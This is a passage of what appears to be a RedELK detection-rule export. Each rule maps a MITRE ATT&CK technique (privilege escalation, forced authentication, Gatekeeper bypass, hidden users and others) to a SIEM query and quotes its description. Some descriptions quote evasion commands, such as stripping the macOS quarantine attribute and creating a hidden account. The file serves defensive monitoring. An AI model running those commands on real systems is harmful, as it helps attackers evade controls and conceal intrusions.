takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1068","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1068] Exploitation for Privilege Escalation","query":"threat.technique.id: T1068","references":["https://attack.mitre.org/techniques/T1068"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1068","name":"Exploitation for Privilege Escalation","id":"T1068"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\nThere are several well-known vulnerabilities that exist in common services such as SMB [1] and RDP [2] as well as applications that may be used within internal networks such as MySQL [3] and web server services. [4]\nDepending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1210","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1210] Exploitation of Remote Services","query":"threat.technique.id: T1210","references":["https://attack.mitre.org/techniques/T1210"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1210","name":"Exploitation of Remote Services","id":"T1210"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.\nAccess to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[1] Access to remote services may be used as a redundant or persistent access mechanism during an operation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1133","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1133] External Remote Services","query":"threat.technique.id: T1133","references":["https://attack.mitre.org/techniques/T1133"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1133","name":"External Remote Services","id":"T1133"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1133","name":"External Remote Services","id":"T1133"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1008","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1008] Fallback Channels","query":"threat.technique.id: T1008","references":["https://attack.mitre.org/techniques/T1008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1008","name":"Fallback Channels","id":"T1008"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).[1] Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. [2] [3]\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.[4] More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. [5] [6]\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1181","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1181] Extra Window Memory Injection","query":"threat.technique.id: T1181","references":["https://attack.mitre.org/techniques/T1181","https://attack.mitre.org/techniques/T1055/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1181","name":"Extra Window Memory Injection","id":"T1181"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1181","name":"Extra Window Memory Injection","id":"T1181"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. [1]\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1006","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1006] File System Logical Offsets","query":"threat.technique.id: T1006","references":["https://attack.mitre.org/techniques/T1006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1006","name":"File System Logical Offsets","id":"T1006"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1107","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1107] File Deletion","query":"threat.technique.id: T1107","references":["https://attack.mitre.org/techniques/T1107","https://attack.mitre.org/techniques/T1070/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1107","name":"File Deletion","id":"T1107"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1044","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1044] File System Permissions Weakness","query":"threat.technique.id: T1044","references":["https://attack.mitre.org/techniques/T1044","https://attack.mitre.org/techniques/T1574/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1044","name":"File System Permissions Weakness","id":"T1044"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1044","name":"File System Permissions Weakness","id":"T1044"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. [1] Custom tools may also be used to gather file and directory information and interact with the Native API.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1083","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1083] File and Directory Discovery","query":"threat.technique.id: T1083","references":["https://attack.mitre.org/techniques/T1083"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1083","name":"File and Directory Discovery","id":"T1083"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[1][2] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, .bash_profile and .bashrc, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1222","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1222] File and Directory Permissions Modification","query":"threat.technique.id: T1222","references":["https://attack.mitre.org/techniques/T1222"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1222","name":"File and Directory Permissions Modification","id":"T1222"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.[1] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1495","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1495] Firmware Corruption","query":"threat.technique.id: T1495","references":["https://attack.mitre.org/techniques/T1495"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1495","name":"Firmware Corruption","id":"T1495"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [1] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [2] [3]\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [4] With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. [5]\nThere are several different ways this can occur. [6] Some specifics from in-the-wild use include:\nA spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [7]\nA modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1187","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1187] Forced Authentication","query":"threat.technique.id: T1187","references":["https://attack.mitre.org/techniques/T1187"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1187","name":"Forced Authentication","id":"T1187"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Graphical User Interface","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1061","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1061] Graphical User Interface","query":"threat.technique.id: T1061","references":["https://attack.mitre.org/techniques/T1061","https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1061","name":"Graphical User Interface","id":"T1061"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using Drive-by Compromise. This completely bypasses the built-in Gatekeeper check. [1] The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. [2] [3]\nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1144","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1144] Gatekeeper Bypass","query":"threat.technique.id: T1144","references":["https://attack.mitre.org/techniques/T1144","https://attack.mitre.org/techniques/T1553/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1144","name":"Gatekeeper Bypass","id":"T1144"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.[1][2]\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\nMalicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.[2][3][4][5][6] Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.[3]\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.[3][4] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.[7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1484","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1484] Group Policy Modification","query":"threat.technique.id: T1484","references":["https://attack.mitre.org/techniques/T1484"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1484","name":"Group Policy Modification","id":"T1484"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping [1], man-in-the middle encryption breaking [2], keystroke injection [3], kernel memory reading via DMA [4], adding new wireless access to an existing network [5], and others.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1200","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1200] Hardware Additions","query":"threat.technique.id: T1200","references":["https://attack.mitre.org/techniques/T1200"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1200","name":"Hardware Additions","id":"T1200"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\nThis setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history.\nAdversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1148","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1148] HISTCONTROL","query":"threat.technique.id: T1148","references":["https://attack.mitre.org/techniques/T1148","https://attack.mitre.org/techniques/T1562/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1148","name":"HISTCONTROL","id":"T1148"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name [1] [2]. Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like \"ls\". Users must specifically change settings to have these files viewable.\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app [3]. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1158","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1158] Hidden Files and Directories","query":"threat.technique.id: T1158","references":["https://attack.mitre.org/techniques/T1158","https://attack.mitre.org/techniques/T1564/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1158","name":"Hidden Files and Directories","id":"T1158"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1158","name":"Hidden Files and Directories","id":"T1158"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.\nOn Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. [1]\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1143","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1143] Hidden Window","query":"threat.technique.id: T1143","references":["https://attack.mitre.org/techniques/T1143","https://attack.mitre.org/techniques/T1564/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1143","name":"Hidden Window","id":"T1143"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.\nThere is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the Create Account technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. [1].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1147","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1147] Hidden Users","query":"threat.technique.id: T1147","references":["https://attack.mitre.org/techniques/T1147","https://attack.mitre.org/techniques/T1564/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1147","name":"Hidden Users","id":"T1147"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.[1] Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\nHooks procedures, which intercept and execute designated code in response 